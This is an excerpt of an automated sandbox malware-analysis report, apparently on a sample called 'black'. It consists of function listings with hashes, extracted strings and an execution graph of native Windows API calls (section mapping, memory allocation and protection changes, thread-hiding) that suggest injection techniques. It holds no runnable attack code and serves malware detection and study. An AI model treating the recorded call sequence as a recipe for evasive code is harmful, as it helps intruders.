                                                  • Instruction ID: 3ab185ab4c10db8a7776b236c8ea8063614f7d44176b31833aaccd44c0ad705a
                                                  • Opcode Fuzzy Hash: a8e701da9b27f44347fd9fa80048354294b8735edac2164d562233f6e68b2ae2
                                                  • Instruction Fuzzy Hash: 7CF01C30901608EFCB18CB94DA846BC77BBBB41304F2089A9D40A1F390CB719E45DF9A
                                                  Function 00CD9EE8 Relevance: .0, Instructions: 24COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4146989480.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_cd0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: effe5a482889b00e67e94b42fe56db5a0137cc4a4712eb462ef4719a18f88133
                                                  • Instruction ID: 0dc240c0b1edf7f78962e42f88614b0717fc8af348eac4761fa41b8223b3010f
                                                  • Opcode Fuzzy Hash: effe5a482889b00e67e94b42fe56db5a0137cc4a4712eb462ef4719a18f88133
                                                  • Instruction Fuzzy Hash: 65F0397558A2859FC716CFA88A92458BF79AE8320472990DBC440DF6B3C2320B16DB55
                                                  Function 00CDDDE8 Relevance: .0, Instructions: 21COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4146989480.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_cd0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5b74703d12d4600d6a8b2e6c0735e96162117883fc024fac61420ca8b71996a5
                                                  • Instruction ID: 93b503b6668fa1657d5e2fa5e4d0b4e63ca971b533e927097af80a2377d433d1
                                                  • Opcode Fuzzy Hash: 5b74703d12d4600d6a8b2e6c0735e96162117883fc024fac61420ca8b71996a5
                                                  • Instruction Fuzzy Hash: 06E0E574E01208AFCB84EFA8D444A9CFBF4FB48300F10C2AAA818E7310E7349A44DF91
                                                  Function 00CD9EF8 Relevance: .0, Instructions: 18COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4146989480.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_cd0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 60b137658facb4ac030a63db8c815e3d261834d444a6e07f919465f3f62f785d
                                                  • Instruction ID: 2fd6927c8a223e8c089461e2ea73957ae791eea6fcd5f45a2646f9de3fd2a527
                                                  • Opcode Fuzzy Hash: 60b137658facb4ac030a63db8c815e3d261834d444a6e07f919465f3f62f785d
                                                  • Instruction Fuzzy Hash: 39E08C34D0220DEBC744DFE8AA0569CBBB9EF41300F1480AA981463260DB300B55EB85
                                                  Function 02500C60 Relevance: .0, Instructions: 17COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4147473694.0000000002500000.00000040.00000800.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2500000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 712d68ca3ed6a5c22da10d7abbf10377fd84d79da7b39d34842735b82d54497e
                                                  • Instruction ID: 01cb9ac61af09d457f0a86b3242215e8b138945fa4aa06f4071e66f4bc7f798a
                                                  • Opcode Fuzzy Hash: 712d68ca3ed6a5c22da10d7abbf10377fd84d79da7b39d34842735b82d54497e
                                                  • Instruction Fuzzy Hash: 45D0127090120CDBC740EFA8E941B6DB7F9BB44344F504195A40493250DB345F00EB91
                                                  Function 025000A0 Relevance: .0, Instructions: 17COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4147473694.0000000002500000.00000040.00000800.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2500000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bedcae3aa53767e6c24dec35857b1c3b5419c54a14920693022698ab72147bcd
                                                  • Instruction ID: ef0f07833104534b935747410078eccecd0824721f81fbeb68ccec29fcfbb07d
                                                  • Opcode Fuzzy Hash: bedcae3aa53767e6c24dec35857b1c3b5419c54a14920693022698ab72147bcd
                                                  • Instruction Fuzzy Hash: DAD0127090110CEBCB40EFE8D901A5D77F9BB45314F504199A409A7390DB711F04A755

                                                  Non-executed Functions

                                                  Function 02501700 Relevance: 5.1, Strings: 4, Instructions: 56COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4147473694.0000000002500000.00000040.00000800.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2500000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $^q$$^q$$^q$$^q
                                                  • API String ID: 0-2125118731
                                                  • Opcode ID: 9a16b2cab75118bf871fe1df8f4807fbd4e77911327648144d07d5f358393ce5
                                                  • Instruction ID: f3a2f92b952c4d457e2041fc9878df70c534cf77ad18b180d0d3f85eb5729c5e
                                                  • Opcode Fuzzy Hash: 9a16b2cab75118bf871fe1df8f4807fbd4e77911327648144d07d5f358393ce5
                                                  • Instruction Fuzzy Hash: E721F174E0120DDFCB58DF98D984AADBBF1FB05300F60845AD414AB394D730AA40CF56
                                                  Function 02500A78 Relevance: 2.5, Strings: 2, Instructions: 43COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4147473694.0000000002500000.00000040.00000800.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2500000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4'^q$4'^q
                                                  • API String ID: 0-2697143702
                                                  • Opcode ID: 8ad3af75e5c20ed641d641ee508b59c3edbe622bfc8ee50e91a3313cedfc8ae7
                                                  • Instruction ID: 6f8b7578903734f7280af573da36e1026e55625be2362a146755b73cb3f6ef26
                                                  • Opcode Fuzzy Hash: 8ad3af75e5c20ed641d641ee508b59c3edbe622bfc8ee50e91a3313cedfc8ae7
                                                  • Instruction Fuzzy Hash: EB01E574E0520DEFCB48DFA9D984AAEBBF1BB05300F1089A9D814B7390D7309E40CB55
                                                  Function 025013D0 Relevance: 2.5, Strings: 2, Instructions: 43COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4147473694.0000000002500000.00000040.00000800.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2500000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4'^q$4'^q
                                                  • API String ID: 0-2697143702
                                                  • Opcode ID: c65b26bc2db7f6f1444ff3deeeaea472fdacf1a76d025e2cc90037fc78228666
                                                  • Instruction ID: a7ed62bdc06196d6ba01be60319b676e039e7dfd5a7ded4d49b951b81d179f3f
                                                  • Opcode Fuzzy Hash: c65b26bc2db7f6f1444ff3deeeaea472fdacf1a76d025e2cc90037fc78228666
                                                  • Instruction Fuzzy Hash: FD01D374E01209EFCB44DFA8D9806AEBBF5FB05304F2085AAD814B7390D7309A41CB5A
                                                  Function 025012E0 Relevance: 2.5, Strings: 2, Instructions: 43COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4147473694.0000000002500000.00000040.00000800.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2500000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4'^q$4'^q
                                                  • API String ID: 0-2697143702
                                                  • Opcode ID: 9385aab198a53a2cd13c417e4c6d8173049e072f49000b63440368fd3c3d7324
                                                  • Instruction ID: 450200d9410fc406f1578e4fbee347cb5c49555487595e71476ef92887956ccf
                                                  • Opcode Fuzzy Hash: 9385aab198a53a2cd13c417e4c6d8173049e072f49000b63440368fd3c3d7324
                                                  • Instruction Fuzzy Hash: 0401D374E0520DEFCF44EFA8E9806AEBBF5BB44300F5095AAD414A7380D7309A40CB6A
                                                  Function 025004A0 Relevance: 1.3, Strings: 1, Instructions: 50COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4147473694.0000000002500000.00000040.00000800.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2500000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Ycq
                                                  • API String ID: 0-568356231
                                                  • Opcode ID: 5f582bd464efd3f3043d56fa9ba457306246b57126cfd3ed86b287f7d4c3ae8f
                                                  • Instruction ID: 8b7d57272331ee875579e516560ce2e91d29d95e345730ed7b0e1be8d8e5ed4f
                                                  • Opcode Fuzzy Hash: 5f582bd464efd3f3043d56fa9ba457306246b57126cfd3ed86b287f7d4c3ae8f
                                                  • Instruction Fuzzy Hash: A7012574E002099BCF04DFA8D840AEEFBF6FB89310F10906AE914B3354CB319A01DBA4
                                                  Function 02500A74 Relevance: 1.3, Strings: 1, Instructions: 39COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4147473694.0000000002500000.00000040.00000800.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2500000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4'^q
                                                  • API String ID: 0-1614139903
                                                  • Opcode ID: 4d120402d08d4cdc46eddbea1a4d91509d24f10bee779bd4caffbed83933f7e9
                                                  • Instruction ID: 594d8589153893ce716df5403eb6817b223d3b4907276843af7de55bb60bb9e7
                                                  • Opcode Fuzzy Hash: 4d120402d08d4cdc46eddbea1a4d91509d24f10bee779bd4caffbed83933f7e9
                                                  • Instruction Fuzzy Hash: E101D674E05209DFCB44DFA9D984AADBBF1BB05300F2495A9D414B7290D7709A40CF95
                                                  Function 02501620 Relevance: 1.3, Strings: 1, Instructions: 27COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4147473694.0000000002500000.00000040.00000800.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2500000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: LR^q
                                                  • API String ID: 0-2625958711
                                                  • Opcode ID: 8d319f9f275ce4f6f32dfafd01de30bc9fd99151eea58a8d4dc0ebeeb561e567
                                                  • Instruction ID: afd4ab493b93238735262a57b1ecbcb8ec3dbdd0ff92d20bb66a56b4320314a4
                                                  • Opcode Fuzzy Hash: 8d319f9f275ce4f6f32dfafd01de30bc9fd99151eea58a8d4dc0ebeeb561e567
                                                  • Instruction Fuzzy Hash: 80F0A574E05208ABCB84EFA9D445A9DFBF5AB45704F1091AAD818B3340EA349A459B4A
                                                  Function 023D28F1 Relevance: .1, Instructions: 87COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4147365112.00000000023D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_23d0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b840aa794c42c59f16bc509f61ce14772b2cd32e4db169e7ef5ad979ccc78ac7
                                                  • Instruction ID: 896060759bdf40bc67ffb56421eadf08873304415c7f50e1b187ea385505f49e
                                                  • Opcode Fuzzy Hash: b840aa794c42c59f16bc509f61ce14772b2cd32e4db169e7ef5ad979ccc78ac7
                                                  • Instruction Fuzzy Hash: 0C31DEB5D042588FDB10DFA9D985AEEBFF0AF49324F14802AE808B7251C7346945CFA5
                                                  Function 023D2908 Relevance: .1, Instructions: 79COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4147365112.00000000023D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_23d0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3eab9bd683b5415d099941d461f9dd8c5d2e742caf203b85cf1b393a1c656e32
                                                  • Instruction ID: d6124c87218015207025f1b014e0e86113644f6616e258c63a6a07b6f9bf9ced
                                                  • Opcode Fuzzy Hash: 3eab9bd683b5415d099941d461f9dd8c5d2e742caf203b85cf1b393a1c656e32
                                                  • Instruction Fuzzy Hash: CB31CEB5D002189FDB10DFAAD985AEEFBF0BB49324F14802AE818B7211C7346945CFA5
                                                  Function 02500F9E Relevance: .0, Instructions: 42COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4147473694.0000000002500000.00000040.00000800.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2500000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e96af386a4317dbf6ea0bebb7a4e662baf58f8d125c64e67d5d4fb66c67a61d3
                                                  • Instruction ID: 813900d73ffc35040ba7525512d62f3610a602d264d665180803faf79a1d4228
                                                  • Opcode Fuzzy Hash: e96af386a4317dbf6ea0bebb7a4e662baf58f8d125c64e67d5d4fb66c67a61d3
                                                  • Instruction Fuzzy Hash: 28015A70C092889FCB02CFA898916BDBFB0BF06304F0454DAD050A7292C3748A41DB55
                                                  Function 02500318 Relevance: .0, Instructions: 40COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4147473694.0000000002500000.00000040.00000800.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2500000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a7d355cf9fd42fb03f790540ec550e931ce97f1125fad9b3aa86ca6536a66327
                                                  • Instruction ID: c87d37742de2992022efb4d9846da216d136c51b0af0471517a417935e6de927
                                                  • Opcode Fuzzy Hash: a7d355cf9fd42fb03f790540ec550e931ce97f1125fad9b3aa86ca6536a66327
                                                  • Instruction Fuzzy Hash: C801A874E1820CDFCB45DFA8D884AADBBF4FB09705F109595D414A7390D7709A40CB45
                                                  Function 025003A0 Relevance: .0, Instructions: 40COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4147473694.0000000002500000.00000040.00000800.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2500000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0bd445272b4172359bc91749b5b0572d6988c4bab7d6b9ea04c5dfbdc8caf526
                                                  • Instruction ID: 6d36a6584aed663235ff704e8d69a434cc14efa1d30f60bf31823824e3039adc
                                                  • Opcode Fuzzy Hash: 0bd445272b4172359bc91749b5b0572d6988c4bab7d6b9ea04c5dfbdc8caf526
                                                  • Instruction Fuzzy Hash: BB01A874E1820CDFCB45DFA8D984AAEBBF4FB05304F1096AAE415A7390D7709A41CB55
                                                  Function 02500F28 Relevance: .0, Instructions: 39COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4147473694.0000000002500000.00000040.00000800.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2500000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4f09f26c4c52ab80a63eab3eb061a1fa3462d17c3eed2ea0edf13d59b2fc5467
                                                  • Instruction ID: 0aadc2b980eee2c19e726cd8111d845f8cf1a228e23c05909d967a1fcb760905
                                                  • Opcode Fuzzy Hash: 4f09f26c4c52ab80a63eab3eb061a1fa3462d17c3eed2ea0edf13d59b2fc5467
                                                  • Instruction Fuzzy Hash: 53011DB0D04209EFCB44DFA8D9807ADFBF0FB05304F509599E814A3390D7B09A40DB49
                                                  Function 025014F8 Relevance: .0, Instructions: 39COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4147473694.0000000002500000.00000040.00000800.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2500000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b9be9cabf35f9d6a68531f8b53f39a17015bfceab6d26c68e573572d3da8a642
                                                  • Instruction ID: baadbfa0fdc977ee534b372371cd47b2a05f44ba73a40c1cc16d5893aaa74a25
                                                  • Opcode Fuzzy Hash: b9be9cabf35f9d6a68531f8b53f39a17015bfceab6d26c68e573572d3da8a642
                                                  • Instruction Fuzzy Hash: 4901E470D05218EFCB54DFA8D8846BDBBB1FB05304F5099AAD819AB290D7709A41CF4A
                                                  Function 02500FB0 Relevance: .0, Instructions: 39COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4147473694.0000000002500000.00000040.00000800.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2500000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f0b4843cf10a40f4d18aee5c8f5009958e971d4d8ade0dce66c700969e78ac5a
                                                  • Instruction ID: d9bc76e2318f3a79c48361c2e817cb60a30fb4563f8c25a85f457acdccb42963
                                                  • Opcode Fuzzy Hash: f0b4843cf10a40f4d18aee5c8f5009958e971d4d8ade0dce66c700969e78ac5a
                                                  • Instruction Fuzzy Hash: C1014B70D48248DFCB50DFA8D4806BDBBB1FB05300F50959AE420A3280D7709A41DB44
                                                  Function 02500BFD Relevance: .0, Instructions: 26COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4147473694.0000000002500000.00000040.00000800.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2500000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9fd0c07119948464c64f18b3072a40132db1d8e0f1ed2c580b662be2bf268ecd
                                                  • Instruction ID: 3b2ab1a72e1f52d4c4eaf5c13b72b199f65151a676f0753393f506c3da88da3d
                                                  • Opcode Fuzzy Hash: 9fd0c07119948464c64f18b3072a40132db1d8e0f1ed2c580b662be2bf268ecd
                                                  • Instruction Fuzzy Hash: E3E0ED70D0120DAFCB40EFA8D8416ADFBB4FB05304F4055AA9454B3280EB704651CB49
                                                  Function 02500C00 Relevance: .0, Instructions: 25COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4147473694.0000000002500000.00000040.00000800.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2500000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1abb4ea4a37a727fd60cd2b95a6b8ac9581d64189effebdae58527435913deb6
                                                  • Instruction ID: 2b03cce71e8fdd4de98b8b3676534ce1d78d822be590510b81e90cbb93f569a5
                                                  • Opcode Fuzzy Hash: 1abb4ea4a37a727fd60cd2b95a6b8ac9581d64189effebdae58527435913deb6
                                                  • Instruction Fuzzy Hash: 1EE0E570D0120DAFCB40EFA8E8406ADFBB4FB05304F4069AA9858B3280EB704650CB89
                                                  Function 025008E0 Relevance: 5.1, Strings: 4, Instructions: 57COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4147473694.0000000002500000.00000040.00000800.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2500000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4'^q$4'^q$$^q$$^q
                                                  • API String ID: 0-2049395529
                                                  • Opcode ID: e122fa5772035c44561699011a5a530e9168dfe383bdf3b54e0db1ebfd7fb0cd
                                                  • Instruction ID: 6d058a5859e36aef343fd061f3502b98e52d50a3bbd8b6a1c3f38634f9974c18
                                                  • Opcode Fuzzy Hash: e122fa5772035c44561699011a5a530e9168dfe383bdf3b54e0db1ebfd7fb0cd
                                                  • Instruction Fuzzy Hash: D821F934E0120CEFEB18DF99D994BADBBB1BB55300F108899E455AB3D4C7309E84DB85

                                                  Execution Graph

                                                  Execution Coverage:31.1%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:0%
                                                  Total number of Nodes:36
                                                  Total number of Limit Nodes:0
                                                  execution_graph 22322 4bac3b8 22323 4bac401 NtQuerySystemInformation 22322->22323 22325 4bac46e 22323->22325 22326 4bac138 22327 4bac187 NtOpenFile 22326->22327 22329 4bac20a 22327->22329 22334 4bac788 22335 4bac7d1 NtDeviceIoControlFile 22334->22335 22337 4bac880 22335->22337 22366 4bab548 22367 4bab58c NtSetInformationThread 22366->22367 22369 4bab5f9 22367->22369 22342 4bd8b78 22343 4bd8bc0 EnumWindows 22342->22343 22345 4bd8c25 22343->22345 22330 4bab420 22331 4bab469 NtQueryInformationProcess 22330->22331 22333 4bab4e1 22331->22333 22338 4babc80 22339 4babccc NtAllocateVirtualMemory 22338->22339 22341 4babd4f 22339->22341 22346 4bac270 22347 4bac2bf NtCreateSection 22346->22347 22349 4bac34d 22347->22349 22350 4bab660 22351 4bab6a4 NtClose 22350->22351 22353 4bab6f0 22351->22353 22354 4bac660 22355 4bac6a9 NtQueryVolumeInformationFile 22354->22355 22357 4bac721 22355->22357 22358 4bac4d0 22359 4bac51c NtMapViewOfSection 22358->22359 22361 4bac5df 22359->22361 22362 4bab750 22363 4bab79f NtProtectVirtualMemory 22362->22363 22365 4bab817 22363->22365

                                                  Executed Functions

                                                  Function 046C0870 Relevance: 3.8, Strings: 3, Instructions: 71COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 2579 46c0870-46c0895 2580 46c089c-46c08a1 2579->2580 2581 46c0897 2579->2581 2582 46c08c2 2580->2582 2583 46c08a3-46c08ac 2580->2583 2581->2580 2584 46c08c5-46c08cc 2582->2584 2585 46c08ae-46c08b1 2583->2585 2586 46c08b3-46c08b6 2583->2586 2588 46c08ed 2584->2588 2589 46c08ce-46c08d7 2584->2589 2587 46c08c0 2585->2587 2586->2587 2587->2584 2592 46c08f0-46c0921 2588->2592 2590 46c08de-46c08e1 2589->2590 2591 46c08d9-46c08dc 2589->2591 2593 46c08eb 2590->2593 2591->2593 2595 46c0929-46c0932 2592->2595 2593->2592
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.4151714375.00000000046C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_46c0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: a^q$4'^q$4'^q
                                                  • API String ID: 0-622892151
                                                  • Opcode ID: 5718c8ab7db9e46ea8a80fb7f55f0cd6b15c5f5a6d342028e585142331906de8
                                                  • Instruction ID: 6133740b81a19fe4a8ae95c6cde49e6126fd391893d3fe5eb2f93a578def23f8
                                                  • Opcode Fuzzy Hash: 5718c8ab7db9e46ea8a80fb7f55f0cd6b15c5f5a6d342028e585142331906de8
                                                  • Instruction Fuzzy Hash: FC21AD74E0521ADBCF08DE98D5449FEBBB1FB48310F108569E5117B350E731AE85DBA1
                                                  Function 046C0868 Relevance: 2.6, Strings: 2, Instructions: 65COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 2705 46c0868-46c0895 2706 46c089c-46c08a1 2705->2706 2707 46c0897 2705->2707 2708 46c08c2 2706->2708 2709 46c08a3-46c08ac 2706->2709 2707->2706 2710 46c08c5-46c08cc 2708->2710 2711 46c08ae-46c08b1 2709->2711 2712 46c08b3-46c08b6 2709->2712 2714 46c08ed 2710->2714 2715 46c08ce-46c08d7 2710->2715 2713 46c08c0 2711->2713 2712->2713 2713->2710 2718 46c08f0-46c0908 2714->2718 2716 46c08de-46c08e1 2715->2716 2717 46c08d9-46c08dc 2715->2717 2719 46c08eb 2716->2719 2717->2719 2720 46c0912-46c0921 2718->2720 2719->2718 2721 46c0929-46c0932 2720->2721
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.4151714375.00000000046C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_46c0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: a^q$4'^q
                                                  • API String ID: 0-3189636481
                                                  • Opcode ID: c6a2aa8444373caecb16890e8dd50808d77c1cc1d48e84ff256f451ef8e0fce0
                                                  • Instruction ID: ce2a4ca25c7d93e9f4d5b338bbea45ab3b94a35fc5c1a158176aa0bbf88b4deb
                                                  • Opcode Fuzzy Hash: c6a2aa8444373caecb16890e8dd50808d77c1cc1d48e84ff256f451ef8e0fce0
                                                  • Instruction Fuzzy Hash: A221FF34E06209DBCF09DEE8D544AFEBBB1EB49300F10856AE510BB290E7316E45DFA1
                                                  Function 04BAC4C8 Relevance: 1.6, APIs: 1, Instructions: 146nativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtMapViewOfSection.NTDLL(?,?,?,?,?), ref: 04BAC5CD
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.4151925714.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_4ba0000_black.jbxd
                                                  Similarity
                                                  • API ID: SectionView
                                                  • String ID:
                                                  • API String ID: 1323581903-0
                                                  • Opcode ID: ff9a67427bb4fcb03440157cafbeea214c09f6503bd7cc5de16ad025ac0bc2f0
                                                  • Instruction ID: 503f3702e544477a37d2e2759a74f48129022dc6328ab2e3f41923591ac5eba8
                                                  • Opcode Fuzzy Hash: ff9a67427bb4fcb03440157cafbeea214c09f6503bd7cc5de16ad025ac0bc2f0
                                                  • Instruction Fuzzy Hash: 3A5199B9D042589BCF10DFA9D9809DEFBB1BF49314F20A52AE808BB210D735A955CF58
                                                  Function 04BAC4D0 Relevance: 1.6, APIs: 1, Instructions: 144nativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtMapViewOfSection.NTDLL(?,?,?,?,?), ref: 04BAC5CD
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.4151925714.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_4ba0000_black.jbxd
                                                  Similarity
                                                  • API ID: SectionView
                                                  • String ID:
                                                  • API String ID: 1323581903-0
                                                  • Opcode ID: 572b0e64485b6e187e38b4b9b46c4be6e9706b206b1aa7cf4c8c150eb212edaa
                                                  • Instruction ID: 408b0e353f69fd12482a1b509ea60d2f735bbd4b32091264ac9dc37b5deb2d0b
                                                  • Opcode Fuzzy Hash: 572b0e64485b6e187e38b4b9b46c4be6e9706b206b1aa7cf4c8c150eb212edaa
                                                  • Instruction Fuzzy Hash: C0517AB9D042589FCF10DFA9D9809DEFBB1BF49314F20A52AE808B7210D735A955CF58
                                                  Function 04BAC268 Relevance: 1.6, APIs: 1, Instructions: 121nativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtCreateSection.NTDLL(?,?,?,?,?,?,?), ref: 04BAC33B
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.4151925714.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_4ba0000_black.jbxd
                                                  Similarity
                                                  • API ID: CreateSection
                                                  • String ID:
                                                  • API String ID: 2449625523-0
                                                  • Opcode ID: a886d4ec8a17ed03b60fe254650d9f94ab8070ff89038997c529c21b60a0d40f
